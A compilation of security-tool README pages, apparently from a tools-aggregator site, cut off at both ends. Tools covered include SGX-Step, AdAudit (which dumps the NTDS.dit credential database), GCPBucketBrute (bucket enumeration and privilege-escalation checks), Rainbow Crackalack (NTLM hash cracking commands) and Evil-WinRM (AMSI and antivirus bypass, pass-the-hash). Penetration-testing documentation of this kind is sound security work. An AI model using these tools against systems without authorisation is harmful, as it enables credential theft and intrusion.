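print(classify_trace([0, 1, 2, 2, 3, 5]))  # {'zero': 1, 'single': 3, 'multi': 1}
```

Lowering the interval shifts multi-steps toward single- and zero-steps; the precise values in the table above were found by iterating this observation per platform.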

Using SGX-Step in your own projects
The easiest way to get started using the SGX-Step framework in your own projects is through git submodules:
$ cd my/git/project
$ git submodule add git@github.com:jovanbulck/sgx-step.git
$ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above
Have a look at the Makefiles in the app directory to see how a client application can link to libsgxstep plus any local SGX SDK/PSW packages.


Adaudit - Powershell Script To Do Domain Auditing Automation


PowerShell Script to perform a quick AD audit
_____ ____     _____       _ _ _
| _ | \ | _ |_ _ _| |_| |_
| | | | | | | | . | | _|
|__|__|____/ |__|__|___|___|_|_|
by phillips321
If you have any decent PowerShell one-liners that could be used in the script, please let me know. I'm trying to keep this script as a single file with no requirements on external tools (other than ntdsutil and cmd.exe).
Run directly on a DC using a DA account. If you don't trust the code, I suggest reading it first and you'll see it's all harmless! (But shouldn't you be doing that anyway with code you download off the net and then run as DA??)

What this does
  • Device Information
    • Get-HostDetails
  • Domain Audit
    • Get-MachineAccountQuota
    • Get-SMB1Support
    • Get-FunctionalLevel
    • Get-DCsNotOwnedByDA
  • Domain Trust Audit
    • Get-DomainTrusts
  • User Accounts Audit
    • Get-InactiveAccounts
    • Get-DisabledAccounts
    • Get-AdminAccountChecks
    • Get-NULLSessions
    • Get-AdminSDHolders
    • Get-ProtectedUsers
  • Password Information Audit
    • Get-AccountPassDontExpire
    • Get-UserPasswordNotChangedRecently
    • Get-PasswordPolicy
  • Dumps NTDS.dit
    • Get-NTDSdit
  • Computer Objects Audit
    • Get-OldBoxes
  • GPO audit (and checking SYSVOL for passwords)
    • Get-GPOtoFile
    • Get-GPOsPerOU
    • Get-SYSVOLXMLS
  • Check Generic Group AD Permissions
    • Get-OUPerms
  • Check For Existence of LAPS in domain
    • Get-LAPSStatus
  • Check For Existence of Authentication Polices and Silos
    • Get-AuthenticationPoliciesAndSilos

Runtime Args
The following switches can be used in combination
  • -hostdetails retrieves hostname and other useful audit info
  • -domainaudit retrieves information about the AD such as functional level
  • -trusts retrieves information about any domain trusts
  • -accounts identifies account issues such as expired, disabled, etc...
  • -passwordpolicy retrieves password policy information
  • -ntds dumps the NTDS.dit file using ntdsutil
  • -oldboxes identifies outdated OSs like XP/2003 joined to the domain
  • -gpo dumps the GPOs in XML and HTML for later analysis
  • -ouperms checks generic OU permission issues
  • -laps checks if LAPS is installed
  • -authpolsilos checks for existence of authentication policies and silos
  • -all runs all checks, e.g. AdAudit.ps1 -all


threat_note - DPS' Lightweight Investigation Notebook


threat_note is a web application built by Defense Point Security that allows security researchers to add and retrieve indicators related to their research. As of right now this includes the ability to add IP Addresses, Domains and Threat Actors, with more types being added in the future.
This app fills the gap between various solutions currently available, by being lightweight, easy-to-install, and by minimizing fluff and extraneous information that sometimes gets in the way of adding information. To create a new indicator, you only really need to supply the object itself (whether it be a Domain, IP or Threat Actor) and change the type accordingly, and boom! That's it! Of course, supplying more information is definitely helpful, but, it's not required.
Other applications built for storing indicators and research have some shortcomings that threat_note hopes to fix. Some common complaints with other apps are:
  • Hard to install/configure/maintain
  • Need to pay for added features (enterprise licenses)
  • Too much information
    • This boils down to there being so much stuff to do to create new indicators or trying to cram a ton of functions inside the app.

Installation
Now that we are using SQLite, there's no need for a pesky Vagrant machine. All we need to do is install some requirements via pip and fire up the server:
cd threat_note
pip install -r requirements.txt
honcho start
Once the server is running, you can browse to http://localhost:5000 and register a new account to log into threat_note with.

Docker Installation
A development dockerfile is now available, to build it do the following from its directory:
sudo docker build -t threat_note .
sudo docker run -itd -p 8888:8888 threat_note
Once the server is running, you can browse to http://localhost:8888 and register a new account to log into threat_note with.

Usage
For a good "Getting Started" guide on using threat_note, check out this post by @CYINT_dude on his blog.

Screenshots
First up is a shot of the dashboard, which has the latest indicators, the latest starred indicators, and a campaign and indicator type breakdown.

Next is a screenshot of the Network Indicators page, here you will see all the indicators that have a type of "Domain", "Network", or "IP Address".

You can edit or remove the indicator right from this page, by hovering over the applicable icon on the right-hand side of the indicator.

Clicking on a network indicator will pull up the details page for the indicator. If you have Whois information turned on, you'll see the city and country underneath the indicator.

Clicking on the "New Indicator" button on the Network or Threat Actor page will bring up a page to enter details about your new indicator.

If you click on the "Edit Indicator" icon next to an indicator, you'll be presented with a page to edit any of the details you previously entered. You can also click on the "New Attribute" icon at the bottom right to add a new attribute to your indicator.

In the screenshot below you can see the "Threat Actors" page, which is similar to the "Network Indicators" page; however, you'll only be presented with the Threat Actors you've entered.

Below is the Campaign page. It contains all of your indicators, broken out by campaign name. Please note that the "Edit Description" button to the right of the campaign description is broken right now, and will be fixed in a future release. Clicking on an indicator will take you to the indicator detail page.

Lastly, here is the Settings page, where you can delete your threat_note database, as well as control any 3rd party integrations, such as Whois data or VirusTotal information. Turning these integrations on can slow down the time to retrieve details about your indicator. A new feature recently added by @alxhrck was the ability to add an HTTP(s) proxy if you need it to connect to 3rd parties. He also recently added support for a new 3rd party integration, OpenDNS Investigate, which can be activated on this page.



GCPBucketBrute - A Script To Enumerate Google Storage Buckets, Determine What Access You Have To Them, And Determine If They Can Be Privilege Escalated


A script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.
  • This script (optionally) accepts GCP user/service account credentials and a keyword.
  • Then, a list of permutations will be generated from that keyword which will then be used to scan for the existence of Google Storage buckets with those names.
  • If credentials are supplied, the majority of enumeration will still be performed while unauthenticated, but for any bucket that is discovered via unauthenticated enumeration, it will attempt to enumerate the bucket permissions using the TestIamPermissions API with the supplied credentials. This will help find buckets that are accessible while authenticated, but not while unauthenticated.
  • Regardless of whether credentials are supplied, the script will then try to enumerate the bucket permissions using the TestIamPermissions API while unauthenticated. This means that if you don't enter credentials, you will only be shown the privileges an unauthenticated user has, but if you do enter credentials, you will see what access authenticated users have compared to unauthenticated users.
  • WARNING: If credentials are supplied, your username can be disclosed in the access logs of any buckets you discover.

TL;DR Summary
  • Given a keyword, this script enumerates Google Storage buckets based on a number of permutations generated from the keyword.
  • Then, any discovered bucket will be output.
  • Then, any permissions that you are granted (if any) to any discovered bucket will be output.
  • Then the script will check those privileges for privilege escalation (storage.buckets.setIamPolicy) and will output anything interesting (such as publicly listable, publicly writable, authenticated listable, privilege escalation, etc).
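The permutation step above can be pictured with a toy generator like the one below. The affixes and separators here are illustrative assumptions, not GCPBucketBrute's actual wordlist (which is considerably larger):

```python
# Toy keyword-permutation generator in the spirit of GCPBucketBrute.
# AFFIXES and the separator set are hypothetical stand-ins for the
# tool's real, much larger wordlist.
AFFIXES = ["dev", "prod", "staging", "backup", "data"]

def permutations(keyword):
    names = {keyword}
    for affix in AFFIXES:
        for sep in ("-", "_", ""):
            names.add(affix + sep + keyword)  # e.g. dev-test
            names.add(keyword + sep + affix)  # e.g. test_backup
    return sorted(names)

candidates = permutations("test")
print(len(candidates))  # each candidate is then probed as a bucket name
```

Each generated name is then checked for existence in Google Storage, and any hit is passed on to the permission-enumeration phase.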

Requirements
  • Linux/OS X
    • Windows only works for unauthenticated scans. Something is wrong with how the script uses the subprocess module in that it fails when using an authenticated Google client.
  • Python3
  • Pip3

Installation
  1. git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
  2. cd GCPBucketBrute/
  3. pip3 install -r requirements.txt or python3 -m pip install -r requirements.txt

Usage
First, determine the type of authentication you want to use for enumeration: a user account, a service account, or unauthenticated. If you are using a service account, provide the file path to the private key via the -f/--service-account-credential-file-path argument. If you are using a user account, don't provide an authentication argument; you will then be prompted to enter the access token of your user account for accessing the GCP APIs. If you want to scan completely unauthenticated, pass the -u/--unauthenticated argument to hide authentication prompts.
  • Scan for buckets using the keyword "test" while completely unauthenticated:
python3 gcpbucketbrute.py -k test -u
  • Scan for buckets using the keyword "test" while authenticating with a service account (private key stored at ../sa-priv-key.pem), outputting results to out.txt in the current directory:
python3 gcpbucketbrute.py -k test -f ../sa-priv-key.pem -o ./out.txt
  • Scan for buckets using the keyword "test", using a user account access token, running with 10 subprocesses instead of 5:
python3 gcpbucketbrute.py -k test -s 10

Available Arguments
  • -k/--keyword
    • This argument is used to specify what keyword will be used to generate permutations with. Those permutations are what will be searched for in Google Storage.
  • --check-single
    • This argument is mutually exclusive with -k/--keyword and accepts a single string. It allows you to check your permissions on a single bucket, rather than generating a list of permutations based on a keyword. Credit: @BBerastegui
  • -s/--subprocesses
    • This argument specifies how many subprocesses will be used for bucket enumeration. The default is 5 and the higher you set this value, the faster enumeration will be, but your requests-per-second to Google will increase. These are essentially threads, but the script uses subprocesses instead of threads for parallel execution.
  • -f/--service-account-credential-file-path
  • -u/--unauthenticated
    • This argument forces unauthenticated enumeration. With this flag, you will not be prompted for credentials and valid buckets will not be checked for authenticated permissions.
  • -o/--out-file
    • This argument allows you to specify a (relative or absolute) file path to a log file to output the results to. The file will be created if it does not already exist and it will be appended to if it does already exist.
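The process-based parallelism that -s/--subprocesses controls can be sketched in a few lines of Python. This is an illustration of the pattern, not the tool's actual code; `check_bucket` is a dummy stand-in for the real HTTP existence probe:

```python
from multiprocessing import Pool

def check_bucket(name):
    """Dummy stand-in for the real per-name HTTP existence check."""
    return name, name.endswith(("0", "2", "4", "6", "8"))  # fake "exists" result

if __name__ == "__main__":
    candidates = [f"test-bucket-{i}" for i in range(20)]
    with Pool(processes=5) as pool:      # 5 workers, like the -s default
        results = dict(pool.map(check_bucket, candidates))
    print(sum(results.values()), "of", len(results), "names 'found'")
```

Raising the worker count speeds up enumeration linearly until Google's rate limiting becomes the bottleneck, which is the trade-off the argument description above alludes to.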



HAL - The Hardware Analyzer


HAL [/hel/] is a comprehensive reverse engineering and manipulation framework for gate-level netlists focusing on efficiency, extendability and portability. HAL comes with a fully-fledged plugin system, allowing to introduce arbitrary functionalities to the core.

Apart from multiple research projects, HAL is also used in our university lecture Introduction to Hardware Reverse Engineering.

Features
  • Natural directed graph representation of netlist elements and their connections
  • Support for custom gate libraries
  • High performance thanks to optimized C++ core
  • Modularity: write your own C++ Plugins for efficient netlist analysis and manipulation (e.g. via graph algorithms)
  • A feature-rich GUI allowing for visual netlist inspection and interactive analysis
  • An integrated Python shell to exploratively interact with netlist elements and to interface plugins from the GUI
  • Update v1.1.0 Support for Xilinx Unisim, Xilinx Simprim, Synopsys 90nm, GSCLIB 3.0 and UMC 0.18µm libraries is now added

API Documentation
The C++ documentation is available here. The Python documentation can be found here.

Quick Start
Install or build HAL and start the GUI via hal -g. You can list all available options via hal [--help|-h]. We included some example netlists in examples together with the implementation of the respective example gate library in plugins/example_gate_library. For instructions to create your own gate library and other useful tutorials, take a look at the wiki.
Load a netlist from the examples directory and start exploring the graphical representation. Use the integrated Python shell or the Python script window to interact. Both feature (limited) autocomplete functionality.
Let's list all lookup tables and print their Boolean functions:
from hal_plugins import libquine_mccluskey

qm_plugin = libquine_mccluskey.quine_mccluskey()

for gate in netlist.get_gates():
    if "LUT" in gate.type:
        print(gate.name + " (id " + str(gate.id) + ", type " + gate.type + ")")
        print("  " + str(len(gate.input_pin_types)) + "-to-" + str(len(gate.output_pin_types)) + " LUT")
        boolean_functions = qm_plugin.get_boolean_function_str(gate, False)
        for pin in boolean_functions:
            print("  " + pin + ": " + boolean_functions[pin])
        print("")
For the example netlist fsm.vhd this prints:
FSM_sequential_STATE_REG_1_i_2_inst (id 5, type LUT6)
6-to-1 LUT
O: (~I0 I1 ~I2 I3 I4 ~I5) + (I0 ~I2 I3 I4 I5)

FSM_sequential_STATE_REG_0_i_2_inst (id 3, type LUT6)
6-to-1 LUT
O: (I2 I3 I4 ~I5) + (I1 I2) + (I0 I1) + (I1 ~I3) + (I1 ~I4) + (I1 ~I5)

FSM_sequential_STATE_REG_0_i_3_inst (id 4, type LUT6)
6-to-1 LUT
O: (~I1 ~I2 I3 ~I4 I5) + (I0 I5) + (I0 I4) + (I0 I3) + (I0 I1) + (I0 ~I2)

OUTPUT_BUF_0_inst_i_1_inst (id 18, type LUT1)
1-to-1 LUT
O: (~I0)

OUTPUT_BUF_1_inst_i_1_inst (id 20, type LUT2)
2-to-1 LUT
O: (~I0 I1) + (I0 ~I1)

FSM_sequential_STATE_REG_1_i_3_inst (id 6, type LUT6)
6-to-1 LUT
O: (I0 I2 I4) + (~I1 I2 I4) + (I0 ~I3 I4) + (~I1 ~I3 I4) + (I0 I4 ~I5) + (~I1 I4 ~I5) + (I2 I5) + (I2 I3) + (I1 I5) + (I1 I3) + (I0 I1) + (~I0 I5) + (~I0 I3) + (~I0 ~I1) + (I1 ~I2) + (~I0 ~I2) + (~I3 I5) + (~I2 ~I3) + (~I4 I5) + (I3 ~I4) + (I1 ~I4)

Citation
If you use HAL in an academic context, please cite the framework using the reference below:
@misc{hal,
author = {{EmSec Chair for Embedded Security}},
publisher = {{Ruhr University Bochum}},
title = {{HAL - The Hardware Analyzer}},
year = {2019},
howpublished = {\url{https://github.com/emsec/hal}},
}
Feel free to also include the original paper:
@article{2018:Fyrbiak:HAL,
author = {Marc Fyrbiak and Sebastian Wallat and Pawel Swierczynski and Max Hoffmann and Sebastian Hoppach and Matthias Wilhelm and Tobias Weidlich and Russell Tessier and Christof Paar},
title = {{HAL-} The Missing Piece of the Puzzle for Hardware Reverse Engineering, Trojan Detection and Insertion},
journal = {IEEE Transactions on Dependable and Secure Computing},
year = {2018},
publisher = {IEEE}
}

Install Instructions

Ubuntu
HAL releases are available via its own PPA. You can find it here: ppa:sebastian-wallat/hal

macOS
Use the following commands to install hal via Homebrew:
brew tap emsec/hal
brew install hal

Build Instructions
Run the following commands to download and install HAL.
  1. git clone https://github.com/emsec/hal.git && cd hal
  2. To install all necessary dependencies, execute ./install_dependencies.sh
  3. mkdir build && cd build
  4. cmake ..
  5. make
Optionally you can install HAL:
make install

Build on macOS
Please make sure to use a compiler that supports OpenMP. You can install one from e.g. Homebrew via: brew install llvm.
To let cmake know of the custom compiler, use the following command.
cmake .. -DCMAKE_C_COMPILER=/usr/local/opt/llvm/bin/clang -DCMAKE_CXX_COMPILER=/usr/local/opt/llvm/bin/clang++

Disclaimer
HAL is at most alpha-quality software. Use at your own risk. We do not encourage any malicious use of our toolkit.


Cacti - Complete Network Graphing Solution


IMPORTANT
When running Cacti from source downloaded directly from the repository, it is important to run the database upgrade script if you experience any errors referring to missing tables or columns in the database.
Changes to the database are committed to the cacti.sql file, which is used for new installations, and to the installer's database upgrade, which is used for existing installations. Because the version number in the develop branch does not change until release, the database upgrade will not run automatically; it is therefore important to either use the database upgrade script to force the current version or update the version stored in the database.

Running Database Upgrade Script
sudo -u cacti php -q cli/upgrade_database.php --forcever=`cat include/cacti_version`

Updating Cacti Version in Database
update version set cacti = '1.1.38';
Note: Change the above version to the correct version or risk the installer upgrading from a previous version.

About
Cacti is a complete network graphing solution designed to harness the power of RRDtool's data storage and graphing functionality, providing the following features:
  • Remote and local data collectors
  • Device discovery
  • Automation of device and graph creation
  • Graph and device templating
  • Custom data collection methods
  • User, group and domain access controls
All of this is wrapped in an intuitive, easy to use interface that makes sense for both LAN-sized installations and complex networks with thousands of devices.
Developed in the early 2000s by Ian Berry as a high school project, it has been used by thousands of companies and enthusiasts to monitor and manage their Enterprise Networks and Data Centers.

Requirements
Cacti should be able to run on any Linux, UNIX, or Windows based operating system with the following requirements:
  • PHP 5.4+
  • MySQL 5.1+
  • RRDtool 1.3+, 1.5+ recommended
  • NET-SNMP 5.5+
  • Web Server with PHP support
PHP must also be compiled as a standalone CGI or CLI binary. This is required for data gathering via cron.

php-snmp
We mark the php-snmp module as optional. As long as you are not using IPv6 devices, SNMPv3 engine IDs, or SNMPv3 contexts, using php-snmp should be safe. Otherwise, you should consider uninstalling the php-snmp module, as it will create problems. We are aware of these php-snmp problems and are looking to get involved in the PHP project to resolve them.

RRDtool
RRDtool is available in multiple versions, and a majority of them are supported by Cacti. Please remember to confirm your Cacti settings for the RRDtool version if you are having problems rendering graphs.

Documentation
Documentation is available with the Cacti releases and also available for viewing on the Documentation Repository.

Contribute
Check out the main Cacti web site for downloads, change logs, release notes and more!

Community forums
Given the large scope of Cacti, the forums tend to generate a respectable amount of traffic. Doing your part in answering basic questions goes a long way since we cannot be everywhere at once. Contribute to the Cacti community by participating on the Cacti Community Forums.

GitHub Documentation
Get involved in creating and editing Cacti Documentation! Fork, change and submit a pull request to help improve the documentation on GitHub.

GitHub Development
Get involved in development of Cacti! Join the developers and community on GitHub!

Functionality

Data Sources
Cacti handles the gathering of data through the concept of data sources. Data sources utilize input methods to gather data from devices, hosts, databases, scripts, etc... The possibilities are endless as to the nature of the data you are able to collect. Data sources are the direct link to the underlying RRD files; how data is stored within RRD files and how data is retrieved from RRD files.

Graphs
Graphs, the heart and soul of Cacti, are created by RRDtool using the defined data sources definition.

Templating
Bringing it all together, Cacti uses an extensive template system that allows for the creation and consumption of portable templates. Graph, data source, and RRA templates allow for the easy creation of graphs and data sources out of the box. Along with Cacti community support, templates have become the standard way to support graphing any number of devices in use in today's computing and networking environments.

Data Collection (The Poller)
Local and remote data collection support with the ability to set collection intervals. Check out Data Source Profiles within Cacti for more information. Data Source Profiles can be applied to graphs at creation time or at the data template level.
Remote data collection has been made easy through replication of resources to remote data collectors. Even when connectivity to the main Cacti installation is lost from a remote data collector, it will store collected data until connectivity is restored. Remote data collection only requires MySQL and HTTP/HTTPS access back to the main Cacti installation location.

Network Discovery and Automation
Cacti provides administrators a series of network automation functionality in order to reduce the time and effort it takes to setup and manage devices.
  • Multiple definable network discovery rules
  • Automation templates that specify how devices are configured

Plugin Framework
Cacti is more than a network monitoring system, it is an operations framework that allows the extension and augmentation of Cacti functionality. The Cacti Group continues to maintain an assortment of plugins. If you are looking to add features to Cacti, there is quite a bit of reference material to choose from on GitHub.

Dynamic Graph Viewing Experience
Cacti allows for many runtime augmentations while viewing graphs:
  • Dynamically loaded tree and graph view
  • Searching by string, graph and template types
  • Viewing augmentation
  • Simple time span adjustments
  • Convenient sliding time window buttons
  • Single click realtime graph option
  • Easy graph export to csv
  • RRA view with just a click

User, Groups and Permissions
Support for per user and per group permissions at a per realm (area of Cacti), per graph, per graph tree, per device, etc... The permission model in Cacti is role based access control (RBAC) to allow for flexible assignment of permissions. Support for enforcement of password complexity, password age and changing of expired passwords.

RRDtool Graph Options
Cacti supports most RRDtool graphing abilities including:

Graph Options
  • Full right axis
  • Shift
  • Dash and dash offset
  • Alt y-grid
  • No grid fit
  • Units length
  • Tab width
  • Dynamic labels
  • Rules legend
  • Legend position

Graph Items
  • VDEFs
  • Stacked lines
  • User definable line widths
  • Text alignment


Rsdl - Subdomain Scan With Ping Method


Subdomain Scan With Ping Method.

Flags        Value                    Description
--hostname   example.com              Domain to scan.
--output                              Records the output with the domain name.
--list       /tmp/lists/example.txt   List of subdomains.

Installation

  • go get github.com/tismayil/rsdl
  • clone repo and build ( go build rsdl.go )


Used Repos.

  • GO Spinner : github.com/briandowns/spinner - [ go get github.com/briandowns/spinner ]
  • GO Ping : github.com/sparrc/go-ping - [ go get github.com/sparrc/go-ping ]



NetAss2 - Network Assessment Assistance Framework


Easier network scanning with NetAss2 (Network Assessment Assistance Framework).

Makes it easy for pentesters to perform penetration testing on networks.

Dependencies
  • nmap (tool)
  • zmap (tool)

Installation
git clone https://github.com/zerobyte-id/NetAss2.git
cd NetAss2
sudo chmod +x install.bash
sudo ./install.bash

Run
netass2

Existing Menu
- HOST DISCOVERY
- PORT SCAN ON SINGLE HOST
- MASSIVE PORT SCAN VIA DISCOVERED HOSTS
- MASSIVE PORT SCAN VIA LIST ON FILE
- SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
- MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
- SHOW REPORTS

Screenshot (Documentation)




Asset Discover - Burp Suite Extension To Discover Assets From HTTP Response


Burp Suite extension to discover assets from HTTP responses using passive scanning. Refer to our blog Asset Discovery using Burp Suite for more details.
The extension is now part of the BApp store and can be installed directly from the Burp Suite. https://portswigger.net/bappstore/d927f0065171485981d6eb49a860fc3e

Description
Passively parses HTTP responses of the URLs in scope, identifies different types of assets such as domains, subdomains, IPs, S3 buckets, etc., and lists them as informational issues.
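The core idea, regex-scanning response bodies for asset strings, can be illustrated outside Burp as follows. These patterns are deliberately simplified stand-ins, not the extension's actual ones, and the scope domain `example.com` is an assumption:

```python
import re

# Illustrative only: simplified patterns in the spirit of Asset Discover's
# passive checks (the BApp's real regexes are more thorough).
PATTERNS = {
    "ipv4":      r"\b(?:\d{1,3}\.){3}\d{1,3}\b",
    "s3_bucket": r"[\w.-]+\.s3\.amazonaws\.com",
    "subdomain": r"[\w-]+\.example\.com",   # assumed scope domain
}

def find_assets(body):
    """Return each asset type found in an HTTP response body, deduplicated."""
    return {kind: sorted(set(re.findall(rx, body)))
            for kind, rx in PATTERNS.items()}

body = ('img src="https://assets.example.com/x.png"; api 10.0.0.5; '
        'backup at files.s3.amazonaws.com')
print(find_assets(body))
```

In the extension itself, each match is reported back to Burp as an informational issue rather than printed.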

Setup
  • Set up the Python environment by providing the jython.jar file in the 'Options' tab under 'Extender' in Burp Suite.
  • Download the extension.
  • In the 'Extensions' tab under 'Extender', select 'Add'.
  • Change the extension type to 'Python'.
  • Provide the path of the file 'Asset_Discover.py' and click on 'Next'.



Usage
  • Add a URL to the 'Scope' under the 'Target' tab. The extension will start identifying assets through passive scan.



Requirements

Code Credits
A large portion of the base code has been taken from the following sources:


Brave Browser - Next Generation Secure, Fast And Private Web Browser with Adblocker


The Brave Privacy Browser is your fast, safe private web browser with ad blocker, private tabs and pop-up blocker. Browse without being tracked by advertisers, malware and pop-ups. 

Fast & Secure Web Browser
No external plugins or settings! Brave privacy browser simply provides the most secure, lightning fast web browser for Android. Enjoy browsing without popups (pop up blocker), ads, malware and other annoyances.

AdBlock Web Browser
The Brave Privacy Browser App is designed with a built-in AdBlocker (pop up blocker). Brave's free adBlocker protects you from ads which track you as you browse the web, securing your privacy.

Automatic Privacy - AdBlock Browser Protection
The Brave Privacy Browser App also protects you with leading privacy and security features such as HTTPS Everywhere (encrypted data traffic), script blocking, 3rd party cookie blocking and incognito private tabs.

App Features
  • Private browser
  • Free built-in AdBlocker
  • Pop up blocker (blocks ads)
  • Safe private browsing
  • Invasive Ad free web browser
  • Sync Bookmarks securely
  • Free tracking protection web browser
  • Https Everywhere (for security)
  • Script Blocker
  • 3rd party cookie blocker
  • Private bookmarks
  • Browsing history
  • Recent and private tabs
  • Fast, free, private search engine

Brave Rewards
With your old browser, you paid to browse the web by viewing ads. Now, Brave welcomes you to the new Internet. One where your time is valued, your personal data is kept private, and you actually get paid for your attention.

About Brave
Our mission is to save the web by making a safe, private and fast browser while growing ad revenue for content creators. Brave aims to transform the online ad ecosystem with micropayments and a new revenue-sharing solution to give users and publishers a better deal, where safe, fast browsing is the path to a brighter future for an open web.



Rainbow Crackalack - Rainbow Table Generation And Lookup Tools


This project produces open-source code to generate rainbow tables as well as use them to look up password hashes. While the current release only supports NTLM, future releases aim to support MD5, SHA-1, SHA-256, and possibly more. Both Linux and Windows are supported!
For more information, see the project website: https://www.rainbowcrackalack.com/

Volunteering
The project for generating NTLM 9-character tables is now underway! If you create 5 tables for us, your name will be listed on the project website as a project supporter. If you create 200 tables, we will mail you a free magnetic hard drive containing NTLM 9-character tables with 50% efficiency. Ships world-wide!
If you have modern GPU equipment and you'd like to contribute, please reach out using this form to coordinate efforts.

NTLM Tables
Currently, NTLM 8-character tables are available for free download via Bittorrent. For convenience, they may also be purchased on an SSD with a USB 3.0 external enclosure.

Examples

Generating NTLM 9-character tables
The following command shows how to generate a standard 9-character NTLM table:
# ./crackalack_gen ntlm ascii-32-95 9 9 0 803000 67108864 0
The arguments are designed to be comparable to those of the original (and now closed-source) rainbow crack tools. In order, they mean:
Argument     Meaning
ntlm         The hash algorithm to use. Currently only "ntlm" is supported.
ascii-32-95  The character set to use. This effectively means "all available characters on the US keyboard".
9            The minimum plaintext character length.
9            The maximum plaintext character length.
0            The reduction index. Not used under standard conditions.
803000       The chain length for a single rainbow chain.
67108864     The number of chains per table (= 64M).
0            The table part index. Keep all other args the same, and increment this field to generate a single set of tables.
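The scale those arguments imply can be sanity-checked with a few lines of arithmetic. This is a back-of-the-envelope illustration only: the per-table figure is an upper bound that ignores chain merges and duplicate endpoints, so real-world success rates are lower:

```python
# Rough coverage arithmetic for the crackalack_gen invocation above.
charset = 95            # ascii-32-95
length = 9              # 9-character plaintexts (min == max == 9)
chain_len = 803000      # plaintexts hashed per rainbow chain
chains = 67108864       # chains per table (= 64M)

keyspace = charset ** length
per_table = chain_len * chains
print(f"keyspace:            {keyspace:.3e}")
print(f"covered per table:   {per_table:.3e} (upper bound)")
print(f"tables for ~1x pass: {keyspace / per_table:.0f}")
```

This is why the project solicits volunteers: covering the 9-character NTLM keyspace even once requires on the order of ten thousand tables.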

Table lookups against NTLM 8-character hashes
The following command shows how to look up a file of NTLM hashes (one per line) against the NTLM 8-character tables:
# ./crackalack_lookup /export/ntlm8_tables/ /home/user/hashes.txt

Recommended Hardware
The NVIDIA GTX and RTX lines of GPU hardware have been well-tested with the Rainbow Crackalack software and offer an excellent price/performance ratio. Specifically, the GTX 1660 Ti and RTX 2060 are the best choices for building a new cracking machine. This document contains the raw data that backs this recommendation.
However, other modern equipment can work just fine, so you don't necessarily need to purchase something new. The NVIDIA GTX and AMD Vega product lines are still quite useful for cracking!

Change Log
  • v1.0: June 11, 2019: Initial revision.
  • v1.1: August 8, 2019: massive speed improvements (credit Steve Thomas), finalization of NTLM9 spec, bugfixes.

Windows Build
A 64-bit Windows build can be achieved on an Ubuntu host machine by installing the following prerequisites:
# apt install mingw-w64 opencl-headers
Then starting the build with:
# make clean; ./make_windows.sh

Author: Joe Testa (@therealjoetesta)



Evil-Winrm v1.9 - The Ultimate WinRM Shell For Hacking/Pentesting


This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems to make life easier for system administrators.
This program can be used on any Microsoft Windows server with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say it is suited to the post-exploitation phase of hacking/pentesting. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.

Features
  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on output messages (can be disabled optionally)

Help
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash NTHash NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-h, --help Display this help message

Requirements
Ruby 2.3 or higher is needed, along with some ruby gems: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1. Depending on your installation method (3 available), you may need to install these manually.

Installation & Quick Start (3 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)
  • Step 1. Install it (it will install automatically dependencies): gem install evil-winrm
  • Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 2. Git clone and install dependencies on your system manually
  • Step 1. Install dependencies manually: ~$ sudo gem install winrm winrm-fs colorize stringio
  • Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
  • Step 3. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)
  • Step 1. Install bundler: gem install bundler:2.0.2
  • Step 2. Install dependencies with bundler: cd evil-winrm && bundle install --path vendor/bundle
  • Step 3. Launch it with bundler: bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Documentation

Clear text password
If you don't want to put the password in clear text, you can omit the -p argument; the password will then be prompted for interactively, preventing it from being shown on screen.

Ipv6
To use IPv6, the address must be added to /etc/hosts. Then pass the hostname you set there to the -i argument instead of an IP address.

Basic commands
  • upload: local files can be auto-completed using tab key.
    • usage: upload local_filename or upload local_filename destination_filename
  • download:
    • usage: download remote_filename or download remote_filename destination_filename
Note about paths (upload/download): relative paths are not allowed. Use filenames in the current directory or an absolute path.
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary, l04d3r-LoadDll, Donut-Loader and Bypass-4MSI functions that we will explain below. When a ps1 is loaded, all of its functions will be shown.

Load powershell scripts
